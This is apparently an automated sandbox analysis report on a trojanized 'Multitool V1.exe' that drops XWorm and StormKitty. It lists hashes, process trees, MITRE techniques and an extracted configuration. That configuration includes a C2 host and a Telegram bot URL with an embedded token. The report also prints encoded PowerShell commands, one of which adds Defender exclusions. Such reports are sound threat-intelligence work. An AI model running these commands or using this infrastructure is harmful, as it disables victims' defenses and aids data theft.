stormkitty | b148b01f921c8ee6aab7c5cb0b27b494f7ff5632f5a7dd2cbd1ccf206a5eb1ba

General

Target

Multitool V1.exe
Size

307KB
MD5

520f8ed0d73dbc6540fc80ac0c3847e1
SHA1

81476c36b9ea1b6d18864b90310eb95ec20e5475
SHA256

b148b01f921c8ee6aab7c5cb0b27b494f7ff5632f5a7dd2cbd1ccf206a5eb1ba
SHA512

0981f5323101a214f1ee6e57f5d10b2136213ef88b4b44e1bd769114734679c2439f6338df585712137ef01684cc7b2658a3820f79da0b196c2e7a11bb06b2e4
SSDEEP

6144:aMCOuWBJL5pt0UA8yTHsRRs6kkU7ezfQE62e3goypHp/3EvCcp3yVaG:aMCOucJL5pEDkU7Me3gpQTyVaG

Score

10^/10

stormkitty xworm defense_evasion discovery rat stealer trojan

Malware Config

Extracted

Family

xworm

C2

127.0.0.1:38960

metherium-38960.portmap.host:38960

Attributes

Install_directory
%AppData%
install_file
host.exe
telegram
https://api.telegram.org/bot7283946415:AAGGT2xYjdDOFdezS7k5STvPS9SoyGQdKEg

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x00080000000120ff-6.dat	family_xworm
behavioral1/memory/2332-21-0x0000000000EF0000-0x0000000000F0A000-memory.dmp	family_xworm

StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000800000001925c-10.dat	family_stormkitty
behavioral1/memory/2356-20-0x0000000001140000-0x000000000117C000-memory.dmp	family_stormkitty

Stormkitty family
stormkitty
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Executes dropped EXE 2 IoCs

pid	Process
2332	client.exe
2356	svchost.exe

Loads dropped DLL 7 IoCs

pid	Process
2524	Multitool V1.exe
2524	Multitool V1.exe
2608	WerFault.exe
2608	WerFault.exe
2608	WerFault.exe
2608	WerFault.exe
2608	WerFault.exe

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
7	ip-api.com
4	ipinfo.io
5	ipinfo.io

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2608	2356	WerFault.exe	35

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Multitool V1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2128	powershell.exe
1700	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2128	powershell.exe
Token: SeDebugPrivilege	1700	powershell.exe
Token: SeDebugPrivilege	2332	client.exe
Token: SeDebugPrivilege	2356	svchost.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2524 wrote to memory of 1700	2524	Multitool V1.exe	30
PID 2524 wrote to memory of 1700	2524	Multitool V1.exe	30
PID 2524 wrote to memory of 1700	2524	Multitool V1.exe	30
PID 2524 wrote to memory of 1700	2524	Multitool V1.exe	30
PID 2524 wrote to memory of 2128	2524	Multitool V1.exe	32
PID 2524 wrote to memory of 2128	2524	Multitool V1.exe	32
PID 2524 wrote to memory of 2128	2524	Multitool V1.exe	32
PID 2524 wrote to memory of 2128	2524	Multitool V1.exe	32
PID 2524 wrote to memory of 2332	2524	Multitool V1.exe	34
PID 2524 wrote to memory of 2332	2524	Multitool V1.exe	34
PID 2524 wrote to memory of 2332	2524	Multitool V1.exe	34
PID 2524 wrote to memory of 2332	2524	Multitool V1.exe	34
PID 2524 wrote to memory of 2356	2524	Multitool V1.exe	35
PID 2524 wrote to memory of 2356	2524	Multitool V1.exe	35
PID 2524 wrote to memory of 2356	2524	Multitool V1.exe	35
PID 2524 wrote to memory of 2356	2524	Multitool V1.exe	35
PID 2356 wrote to memory of 2608	2356	svchost.exe	36
PID 2356 wrote to memory of 2608	2356	svchost.exe	36
PID 2356 wrote to memory of 2608	2356	svchost.exe	36
PID 2356 wrote to memory of 2608	2356	svchost.exe	36

C:\Users\Admin\AppData\Local\Temp\Multitool V1.exe
"C:\Users\Admin\AppData\Local\Temp\Multitool V1.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2524
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAcQB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAG4AbABlACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUAB5AHQAaABvAG4AIABJAG4AcwB0AGEAbABsAGEAdABpAG8AbgAgAE4AZQBlAGQAZQBlAGQAJwAsACcAJwAsACcATwBLACcALAAnAFcAYQByAG4AaQBuAGcAJwApADwAIwBwAGEAYwAjAD4A"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1700
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAbgB2ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAcwBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGEAcAB6ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAbgB5ACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2128
- C:\Users\Admin\AppData\Roaming\client.exe
  "C:\Users\Admin\AppData\Roaming\client.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2332
- C:\Users\Admin\AppData\Local\svchost.exe
  "C:\Users\Admin\AppData\Local\svchost.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2356
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2356 -s 1088
    3⤵
    - Loads dropped DLL
    - Program crash
    PID:2608

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Obfuscated Files or Information

1

T1027

Command Obfuscation

1

T1027.010

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\svchost.exe

Filesize
213KB

MD5
23b83fe86a71cfba0d920fc658b3e010

SHA1
c9fd9d1dc68bcef1bfb2845d4cc35ea2a5b9d6dc

SHA256
6259f4d3310169e2b795e26a95ae21c7781abcb726322bc2eae0102546c816cf

SHA512
22a49771a71a7b4504635692d0d671223cfb4a5d5f8d892918291f1b733336b935926b67ae032f4797e3067f1d4f4aee4bf2ff2b0f2f607ea465ea6e87365ea3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
b6f86601c857b7e3961451882cb0c89a

SHA1
2aae481ab570232cdc5b5e80a9393353a537ea28

SHA256
f783deb006deb3034dc643bd965e126006c341c6d8da8f700588102fa4f5cfdf

SHA512
9ea03030af073ea8d697569e41e20ab012d7b044955d18e0d6cf390f4b05d86a0c8a168a14297019837d429dd8d164076dd622455a179da3870993eb7b5305fa

Download Submit
C:\Users\Admin\AppData\Roaming\client.exe

Filesize
79KB

MD5
10db01a500572f3468f4302068d6db1e

SHA1
90589a587d2ea36451a11e650a7b0041807b3be8

SHA256
cae10e709d8f1dcf7deee20ddc601be133961ed8542f8505d3a016bbedfc9e84

SHA512
c8cdd0eae61bc94f5978673e2bbda0b7916a87b7ab582036c3b95978b404f78202f3e8f31b32e050fd7298a682382b61db8c9b13828d97786ed052720fd3b8f9

Download Submit
memory/2332-21-0x0000000000EF0000-0x0000000000F0A000-memory.dmp

Filesize
104KB

Download
memory/2356-20-0x0000000001140000-0x000000000117C000-memory.dmp

Filesize
240KB

Download

Analysis

Sharing